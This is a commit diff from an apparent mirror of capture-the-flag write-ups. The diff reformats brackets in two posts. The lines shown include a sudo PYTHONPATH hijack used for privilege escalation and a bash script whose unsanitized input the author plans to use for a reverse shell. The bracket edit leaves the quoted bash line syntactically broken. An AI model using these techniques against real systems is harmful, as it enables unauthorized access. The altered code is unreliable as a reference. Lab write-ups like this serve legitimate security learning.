oxeo0/hacking-blogposts
1
0
Fork 0
mirror of http://git.nowherejezfoltodf4jiyl6r56jnzintap5vyjlia7fkirfsnfizflqd.onion/nihilist/hacking-blogposts.git synced 2025-05-17 04:46:57 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions

fix for obsidian graphs plugin

Browse source
This commit is contained in:
oxeo0 2025-05-16 10:24:34 +02:00
parent ec6691f732
commit 519fd1c612
2 changed files with 2 additions and 2 deletions
Download patch file Download diff file Expand all files Collapse all files

2
Easy/46.md
View file

@ -780,7 +780,7 @@ then we modify the value of the **PYTHONPATH** environment variable to access ou
waldo@admirer:~$ sudo PYTHONPATH=/tmp/nihilist777 /opt/scripts/admin_tasks.sh waldo@admirer:~$ sudo PYTHONPATH=/tmp/nihilist777 /opt/scripts/admin_tasks.sh
[sudo] password for waldo: [sudo] password for waldo:
[[[ System Administration Menu ]]] [ [ [ System Administration Menu ] ] ]
1) View system uptime 1) View system uptime
2) View logged in users 2) View logged in users
3) View crontab 3) View crontab

2
Easy/58.md
View file

@ -292,7 +292,7 @@ So let's take a look at his home directory:
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" & sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done done
if [[ $(wc -l <****$log) -gt 0 ]]; then echo -n > $log; fi if [ [ $(wc -l <****$log) -gt 0 ] ]; then echo -n > $log; fi
Here we see that there is a bashscript that takes a logfile from **/home/kid/logs/hackers** it, gets ip addresses from it and runs nmap against each of them. However the input isn't being sanitized, so let's use it to get a reverse shell: Here we see that there is a bashscript that takes a logfile from **/home/kid/logs/hackers** it, gets ip addresses from it and runs nmap against each of them. However the input isn't being sanitized, so let's use it to get a reverse shell: